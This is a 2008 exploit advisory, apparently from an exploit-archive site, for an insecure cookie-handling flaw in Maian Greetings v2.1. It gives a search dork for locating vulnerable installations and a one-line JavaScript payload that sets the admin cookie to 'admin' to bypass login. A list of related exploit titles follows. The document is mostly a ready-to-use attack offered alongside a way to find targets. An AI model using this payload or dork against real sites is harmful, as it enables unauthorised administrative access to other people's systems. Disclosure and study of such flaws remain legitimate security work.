Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by: Maian Greetings v2.1
Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.
Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"
【Maian Greetings 2.1 Insecure Cookie Handling Vulnerability】相关文章:
★ MS Windows (MessageBox) Memory Corruption Local Denial of Service
★ LoveCMS 1.6.2 Final Update Settings Remote Exploit
★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
★ Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
★ Dreampics Builder (page) Remote SQL Injection Vulnerability
★ webEdition CMS (we_objectID) Blind SQL Injection Exploit
★ minb 0.1.0 Remote Code Execution Exploit
★ Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
★ Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities